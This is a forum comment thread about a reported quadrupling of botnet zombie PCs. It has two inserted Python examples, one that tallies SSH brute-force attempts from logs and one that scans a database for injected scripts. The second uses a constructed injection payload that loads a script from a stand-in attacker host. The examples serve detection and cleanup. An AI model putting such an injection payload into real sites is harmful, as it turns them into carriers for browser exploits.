Zombie Network Explosion
anti-globalism writes "The number of compromised zombie PCs in botnet networks has quadrupled over the last three months. Shadowserver tracks botnet activity and the number of command and control servers. It uses a variety of metrics to slice and dice its figures based in part on the entropy of botnet infections. The clear trend within these figures is upwards, with a rise in botnet numbers of 100,000 to 400,000 (if 30 day entropy is factored into equations) or from 20,000 to 60,000 (for five day entropy)."
Interesting. Far more interesting to me, however, is speculating on how botnets quadrupled in the past three months.
Honest question - without resorting to answers like "if it's not running Linux it's zombied" I'd be curious to know how the average user can even determine whether their box is pwn3d.
If libertarians are so opposed to effective government, why don't they all move to Somalia?
students have too much free time in the summer holidays..
can only mean one of two things:
the machines are starting to take over
people aren't getting any more intelligent with PCs than they are savvy. job security!
Good people go to bed earlier.
because it could mean that people who are vulnerable to these types of attacks are on the rise. You would have thought that after all this time and the numerous virus-by-email crises, people would have learned better.
while(1) attack(People.Sandy);
Zombie Network Explosion? Wasn't that a Flash game on some site?
This guy's the limit!
What is the latest Uwe Boll movie, Alex?
Vista's Security Rendered Completely Useless leading more machines (with Vista) open to drive by downloads, etc, becoming zombies?
Hell yeah! I've seen this movie! It rocks!
Wait...what?
They've become self-aware. Run for the hills!
throw new NoSignatureException();
But it was bots all the way down...
Exactly. That's why all of you need to be working on your zombie plan.
Now if anyone needs me, I'll be in the attic...
I'm actually surprised that we don't see any vigilante developers actually developing something that in some way or another disables or displays information about the serious state the infected machine is in.
Of course, I see the problems with doing so (hasn't there been an article about this topic earlier?), but still, there are a lot of infected machines that have been so for ages and are not likely to vanish. Bandwidth and CPU cycles can definitely be spent on better things than spam.
must be related to the decrease in sunspots in recent weeks
I noticed an incredible increase in DenyHosts alerts over the last three days to the extent that I had to turn off alert emails. This picture says it all: http://stats.denyhosts.net/stats.html
What else!
Genesis 1:32 And God typed
So if researchers can detect these things with apparent reliability in their process, why can't ISPs detect them the same way and cut the bastards off?
If Comcast and ilk such as that were really interested in conserving network bandwidth, they'd be cutting off zombies instead of putting on bandwidth caps.
I want a new quote. One that won't spill. One that don't cost too much. Or come in a pill.
I wonder how many zombies exist in the face of fully updated anti-virus/security software from a major vendor? Anyone out there been 'zombied' in the face of brand-name, fully updated and current anti-virus software and definitions? If so,
what brand(s)?
Internet of the Dead
Because plenty of Windows core services still send traffic even if there's not an obvious "app" in charge of them (there are a bunch of normal system processes that tend to run services underneath them, some of which involve networking).
And that doesn't count traffic on your network as well. Even if your computer isn't sending anything out, it may be responding to other traffic on the network depending on how things are configured, even if it's just to say "this is not the machine you're looking for."
I don't doubt it at all. My computer, which is usually the epitome of clean, caught a worm the other day. It was automatically downloaded and executed (no clicks or dialogs) from one of the top 10 mainstream news websites, no less. Most likely one of the injection attacks. Had to really dig into it to find out that it somehow got downloaded by prefetch in Firefox (which has been promptly disabled now).
The ironic part... with all of the precautions I take, it wasn't detected at the router level nor the virus scan level. Windows firewall caught it before it could download its payload. As I manually removed it and restored from yesterday's registry copy, I had to chuckle a little.
But now that I've seen first-hand an unrequested .exe not only downloaded into ./system32 but executed - both without user approval or so much as a dialog box - I can only imagine how many zombies have popped up in the last few weeks.
We all knew the day would come when Zombies destroyed everything we live for.
Come on, all the machines linking up just in time for the season premiere of the Sarah Connor Chronicles? Fox = marketing genius?
* Making waffles just so I have something to Twitter *
If you block the entrance to a shopping mall you get arrested, but if you take over a tenth of all computers on the entire planet nobody cares?
Hunt the criminals down, fast and hard. Find them and execute them on the spot. Do this everytime a virus breaks out. Everytime.
They will get the message. Yes they will.
correct headline ..
The only thing I found was Kevin Bacon...
...why can't ISPs detect them the same way and cut the bastards off?
They can, and sometimes do.
One time a friend of a friend brought her PC over for me to look at. She said it wasn't working well, and wanted me to fix it. I plugged it into my internet connection just to check a few things, and then went about reformatting it. Later, when I plugged my machine into the net and tried to access the web, I got a default ISP web page telling me to call network security. It turns out that her machine had sent out insane amounts of SMTP packets, and my connection was automatically shut off to prevent more. Since I knew what we were talking about, unlike most customers I suppose, they restored my connection right away rather than keeping a 24 hour shutdown.
Obviously her ISP didn't do this, but mine sure does.
Does it make you happy you're so strange?
"So if researchers can detect these things with apparent reliability in their process, why can't ISPs detect them the same way and cut the bastards off?"
...
If they did, they risk cutting off their own spamVertisers, there's no money in protecting their own customers, it would break stuff, they can't be bothered
that's funny, ne? that's what people deserve for running and supporting windows
There is only one possible explanation; Vista is making inroads, and the botmasters have new openings on it. No other system is growing that fast (Vista is being forced onto new systems by MS). And if it was an old base of some system (say XP), then it would grow MUCH MUCH faster.
I prefer the "u" in honour as it seems to be missing these days.
Sorry for being an uninformed moron, but what exactly is the definition of the "entropy of botnet infections"? Their infection rate? Their "healing" rate?
By will alone I set my mind in motion. - Mentat prayer
Back in 2002-4, I worked for a company that developed specialized packet sniffers, that processed anywhere from 1mb (sold to small companies) to 100 mb drops (sold to ISPs) and a specialized box with much higher for sale to several gov. agencies. A simple PC with tcpdump, dsniff or Ethereal combined with a little bit of processing behind the scene can easily process 100 MB drops.
I'm wondering if I can get Zombie network on Cablevision and if it would be in HD.
If things continue to get worse the year of the Linux desktop will come sooner than you'd expect. I know people who won't do a thing on their computer without worrying about viruses. I think at some point when the concerns and the solutions will have reached a certain point Windows will have irremediably lost its OS monopoly and it won't matter what OS you run anymore.
Not like it matters much anymore for most people anyways, most of what they do involves just a web browser.
You just got troll'd!
Best band name ever!!
I've now seen more than a few examples of linking to a "YouTube Video" where the site looks exactly like YouTube, but the video window contains an Active X control, and the URL is definitely not youtube.com. I only noticed because we're on Macs here and Firefox asked me if I wanted to download the plugin to view the content.
It's all because of Microsoft's new software release, WindowsXP Anti-Virus 2008. Everybody's getting it; Microsoft sends them an email telling them to click a link to get the new download. The damn thing won't run on my Linux box though, I feel left out... sigh.
Oh, clients, why must you want the silly shit you want?
A computer once beat me at chess, but it was no match for me at kick boxing. Emo Philips
This must be the most awesome headline ever
Boom! Out go the lights! You're screwed, in a bad way.
I KNEW Microsoft was up to some new antivirus program. The logic is elegant, and brilliant:
- Design a new OS, oh, call it a browser if you want
- Make it a real heavyweight, more RAM used than the host, threads everywhere, screen candy layered over screen candy, shortcuts, you name it, all to consume cycles and starve the bot software (and the viruses, etc.)
- Botnets wither from lack of nutrition. Herders go broke. In fact, no one gets anything else done on their puters any more. No more harm! NO MORE HARM!
- Profit!
Wait... Wasn't Google? Or did Mozilla just release something? Wait, Opera is always coming up with somethi... Couldn't be AOL could it?... Suppose CERN finally... no, can't be, it's not really running yet, oh, those crazy kids at Apple, wait, the Oracle guys finally... nope, maybe somebody finally fixed... no, that's not it... wait.. Gibson? Nawww....
deleting the extra space after periods so i can stay relevant, yeah.
http://dummcomics.com/index?sid=31
I've had the displeasure of working on plenty of infected systems in my time, and it's fairly easy to disable services that need the network on XP and 2000 systems, and still have a machine you can work with.
Traffic on the network? I would think while troubleshooting a system that you suspect may be infected with something, you would want to isolate the system as much as possible! Putting it in your DMZ instead of on the same network segment as the rest of your network would be a good start. Nothing should be trying to talk to it, intended or not.
I used to maintain a handful of black boxes that easily handled multiple T3 connections to the internet, and did real-time packet inspection.
It's amazing what specialized hardware can do, and even more amazing what a decent PC properly configured can handle.
The botnets are doing better than the elephants!
They'll get the message, for sure. Rather than being obnoxious spammers operating out of a basement, they'll be obnoxious spammers operating out of a basement with lots and lots of guns.
So long as the incentive is there, you're going to have people incentivized by it. You can stack on as many penalties or consequences as you want, you'll still get a few people for whom it won't matter.
There are really only two options; remove the incentive. In this case, I have no idea how that works. Alternatively, work to minimize actual damage. Ironically, I think that spammers are likely to feed into anti-net-neutrality movements. When Comcast is filtering all your traffic, they can filter out virus payloads. Everyone is happy in 1984!
[Ego]out
Speaking as someone that regularly works on number processing and real-time applications, I've given up on Windows machines. I just assume every Windows box is running ample code that is outside my control, and that code will make the machine much slower for any mathematically intensive computations, especially if they involve disk access or network access. All of the anti-virus code designed to stop viruses and bot-nets is killing Windows as a platform.
One way or another, you pay your speed and uptime penalty. You either pay in downtime caused by the "bad" guys writing bot-nets, malware or viruses, or you pay in slow speed caused by the "good" guys like Microsoft, Symantec, and McAfee, who are trying to stop the bot-nets, malware and viruses. The modern "good" vs. "bad" arms race is resulting in anti-virus software that is so slow that it is strangling the Windows platform with endless code bloat. If you want to prove this to yourself, get an older PC with a fresh Windows installation. Start installing software on it, one package at a time. As the newer service packs are applied, the anti-virus software installed, and the software packages installed, the PC will actually slow down!
Building better anti-virus software for Windows is self-defeating. It slows the computer down to the point that Windows is useless.
Run Linux. Take control of your own computer.
There's that new "antivirus XP" thing doing the rounds. I bet loads of people have been stupid enough to click on that.
No sig today...
Not sure if you're having the same experience that I am or not. I have a system at home that acts as a (FreeBSD) web server. Periodically I'll see single days where 300+ individual systems will attempt to get in via ssh. According to /var/log/messages, each system tries on average one user name and then gives up.
Of course quite a few of them are trying root (which any smart admin will disable for remote access), but nonetheless I see a lot of this.
My question for you though is whether or not it is even worthwhile to blacklist and lock out these systems. It seems like they only try once and give up - I suspect that locking all these out could end up just producing an obscenely long list of firewall rules that might not necessarily solve anything.
Feel free to let me know if you think I'm missing something, or if you are seeing something different in your traffic.
Damn_registrars has no butt-hole. Damn_registrars has no use for a butt-hole.
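Added example, not from the thread or any poster in it: a Python script that does the bookkeeping the question above asks for. It parses constructed FreeBSD-style sshd lines of the kind found in /var/log/messages, counts attempts per source address (one failed attempt can produce both an "Invalid user" line and a PAM line under the same sshd pid, so those are folded together), reports what fraction of sources only tried once, and emits pf table commands only for sources over a threshold. The hostnames, addresses and usernames in the sample are made up, and the `bruteforce` table name is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample lines in the syslog format sshd writes on FreeBSD.
# Hosts, addresses (RFC 5737 ranges) and usernames are made up.
SAMPLE_LOG = """\
Aug 12 03:14:07 web sshd[4011]: Invalid user admin from 198.51.100.7
Aug 12 03:14:09 web sshd[4011]: error: PAM: authentication error for illegal user admin from 198.51.100.7
Aug 12 03:15:22 web sshd[4020]: error: PAM: authentication error for root from 203.0.113.45
Aug 12 03:16:01 web sshd[4027]: Invalid user test from 198.51.100.8
Aug 12 03:20:44 web sshd[4033]: error: PAM: authentication error for root from 203.0.113.45
Aug 12 03:21:02 web sshd[4036]: error: PAM: authentication error for root from 203.0.113.45
Aug 12 03:25:10 web sshd[4041]: Invalid user oracle from 192.0.2.19
Aug 12 03:30:33 web sshd[4050]: Accepted publickey for dave from 192.0.2.200 port 51515 ssh2
"""

# Two failure shapes: an unknown username, or a PAM rejection (which also
# carries "illegal user" when the name did not exist).
LINE_RE = re.compile(
    r"sshd\[(?P<pid>\d+)\]: "
    r"(?:Invalid user (?P<u1>\S+) from (?P<ip1>\S+)"
    r"|error: PAM: authentication error for (?:illegal user )?(?P<u2>\S+) from (?P<ip2>\S+))"
)


def parse_failures(log_text):
    """Return one (ip, user) tuple per failed attempt, folding the two lines a
    single attempt can emit under the same sshd pid into one record."""
    seen = set()
    attempts = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        user = m.group("u1") or m.group("u2")
        ip = m.group("ip1") or m.group("ip2")
        key = (m.group("pid"), user, ip)
        if key in seen:
            continue
        seen.add(key)
        attempts.append((ip, user))
    return attempts


def summarize(attempts):
    """Per-source count of attempts and the set of usernames tried."""
    per_ip = defaultdict(lambda: {"attempts": 0, "users": set()})
    for ip, user in attempts:
        per_ip[ip]["attempts"] += 1
        per_ip[ip]["users"].add(user)
    return dict(per_ip)


def single_shot_fraction(per_ip):
    """Share of sources that tried exactly once; blocking those buys little."""
    if not per_ip:
        return 0.0
    singles = sum(1 for s in per_ip.values() if s["attempts"] == 1)
    return singles / len(per_ip)


def users_tried(attempts):
    """Which usernames the scanners go after, regardless of source."""
    counts = defaultdict(int)
    for _, user in attempts:
        counts[user] += 1
    return dict(counts)


def block_candidates(per_ip, min_attempts=2):
    """Only sources that keep coming back are worth a firewall entry."""
    return sorted(ip for ip, s in per_ip.items() if s["attempts"] >= min_attempts)


def pf_commands(ips, table="bruteforce"):
    """pfctl invocations to add the addresses to a pf table (table name assumed)."""
    return [f"pfctl -t {table} -T add {ip}" for ip in ips]


if __name__ == "__main__":
    attempts = parse_failures(SAMPLE_LOG)
    per_ip = summarize(attempts)
    print(f"{len(attempts)} failed attempts from {len(per_ip)} sources; "
          f"{single_shot_fraction(per_ip):.0%} of sources tried only once")
    print("usernames:", users_tried(attempts))
    for cmd in pf_commands(block_candidates(per_ip)):
        print(cmd)
```

Run as shown and the only address that earns a rule is the one that came back three times for root; the three one-shot sources are reported but not blocked, which is the trade-off the question raises. Pointing `parse_failures` at the real file instead of `SAMPLE_LOG` is the only change needed to use it on a live box.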
>If your machine's admin password is blank and you're not behind a NAT, you are completely exposed.
As of XP Service Pack 2, the built-in software firewall is on by default, and blank passwords disable network logins. Not that the security posture of the typical home machine is anything we'd consider decent, but it's not the same as running sshd with a blank root password would be.
I think that this rise in zombies is 100% attributed to the latest sql injection attacks that are going around. The attacks append links to an external javascript file to every field in a sql database in the hopes that it will be rendered on the website. When it is rendered then the javascript tries a bunch of exploits on different browsers and plugins to deliver its payload and create another bot. This attack turns insecure web servers into carriers for the exploit.
The number of attacks using this has been going through the roof all summer.
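Added example, not from the thread or any poster in it: a Python script that checks a content database for the kind of injected external script tag the post above describes, scanning every column of every table and stripping the fragment with a parameterized UPDATE. The tables, rows, payload and `evil.example` URL are constructed for the example; SQLite is used so it runs offline.

```python
import re
import sqlite3

# A <script> element that loads an external file, which is what the mass
# injection described above appends to stored fields.
EXTERNAL_SCRIPT_RE = re.compile(r"<script\b[^>]*\bsrc\s*=", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# The whole appended fragment: an optional </title> (to break out of a page
# title) followed by the script element. Assumption: this matches the payload
# shape used in the constructed data; real campaigns vary the wrapper.
INJECTED_FRAGMENT_RE = re.compile(
    r"(?:</title>)?<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL
)

PAYLOAD = "</title><script src=http://evil.example/x.js></script>"  # constructed


def build_sample_db():
    """Constructed content database; three fields carry the appended payload."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT, text TEXT)")
    conn.executemany("INSERT INTO articles (title, body) VALUES (?, ?)", [
        ("Botnet numbers up" + PAYLOAD, "Shadowserver counts C&C servers." + PAYLOAD),
        ("Vista security", "Nothing injected here."),
    ])
    conn.executemany("INSERT INTO comments (author, text) VALUES (?, ?)", [
        ("alice", "Interesting."),
        ("bob", "Run Linux." + PAYLOAD),
    ])
    conn.commit()
    return conn


def _tables(conn):
    return [r[0] for r in conn.execute("SELECT name FROM sqlite_master WHERE type='table'")]


def scan_for_injected_scripts(conn):
    """Walk every column of every table; return (table, column, rowid, script_url)
    for each field that loads an external script."""
    hits = []
    for table in _tables(conn):
        cols = [r[1] for r in conn.execute(f'PRAGMA table_info("{table}")')]
        for row in conn.execute(f'SELECT rowid, * FROM "{table}"'):
            rowid, values = row[0], row[1:]
            for col, val in zip(cols, values):
                if isinstance(val, str) and EXTERNAL_SCRIPT_RE.search(val):
                    m = SRC_RE.search(val)
                    hits.append((table, col, rowid, m.group(1) if m else None))
    return hits


def remove_injected_scripts(conn):
    """Strip the fragment from each hit using a parameterized UPDATE (the cleanup
    must not itself concatenate untrusted text into SQL); return fields fixed."""
    fixed = 0
    for table, col, rowid, _ in scan_for_injected_scripts(conn):
        (val,) = conn.execute(
            f'SELECT "{col}" FROM "{table}" WHERE rowid = ?', (rowid,)
        ).fetchone()
        cleaned = INJECTED_FRAGMENT_RE.sub("", val)
        conn.execute(
            f'UPDATE "{table}" SET "{col}" = ? WHERE rowid = ?', (cleaned, rowid)
        )
        fixed += 1
    conn.commit()
    return fixed


if __name__ == "__main__":
    db = build_sample_db()
    for table, col, rowid, url in scan_for_injected_scripts(db):
        print(f"{table}.{col} rowid={rowid} loads {url}")
    print("cleaned", remove_injected_scripts(db), "fields")
```

The scan only finds what is already sitting in the database; it does nothing about how it got there. The part that stops the site becoming a carrier again is the application code binding user input as parameters, exactly as the cleanup above does, instead of pasting it into the query string.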
...if your computer is part of a bot-net?
Glad you had so much to offer in this thread.
Read some more, I clarified my original post in a follow up, and I didn't forget about services, which can be disabled just like applications.
I guess I'll have to start posting 200 page technical docs for folks like you and the guy I originally posted to, since you apparently need the hand holding.
"if it's not running Linux it's zombied"
It isn't that easy. It might also be running BSD.
So now BSD is undead?
Er, wait a second...
If they can tell a PC is infected, I guess by the type of traffic it is spitting out, do they let the poor saps know it is infected? Hello, your computer is infected, click here to run a scan......
Even powered-down machines have network cards that "blink" regularly depending on the network you are plugged into.
There is plenty of self-sustaining network traffic that is generated across a switched network. Such as:
ARP Requests
Multicasts
DHCP Requests
Netbios Requests (yes - still exists)
Cisco CDP (as others)
Routing protocol HELLOs
Are you plugged into a hub?
Any type of Proactive Corporate monitoring
Almost all manufacturers' network cards are still active even when you have supposedly powered down the computer or server. This is a bad detection mechanism at best. At worst it is completely misleading.
are they PC's that have died but were able to reboot?
This title looks to me more like a bad movie than a story.
VLC FOR MAC IS DYING! IF YOU DEVELOP, PLEASE SAVE IT!!
What do I look for on my web server? What do I look for on a computer? Can a router or a Macintosh become a zombie?
"What would happen if all of these dabbling idiots were on linux instead of windows"
.. ?
The dabbling idiots shouldn't be allowed to use Linux until they have learned to compile the kernel, and what about all the dabbling Mac idiots?
security, windows, brains. The three words that have the least in common.
"I bow to no man" - Riddick
Hey, I posted that first!
...but I haven't seen such a spike in spam (virus-laden or otherwise) at all.
But then again, I don't check my server logs that often any more. Maybe I should...
Remember what happened the last time the botnets went on a recruiting spree? (Hint: Georgia).
I wonder who they are prepping to DDOS this time? Georgia again? U.S. infrastructure? Which country is Russia invading next--or are they just going to finish the job they started in Georgia?
---dragoness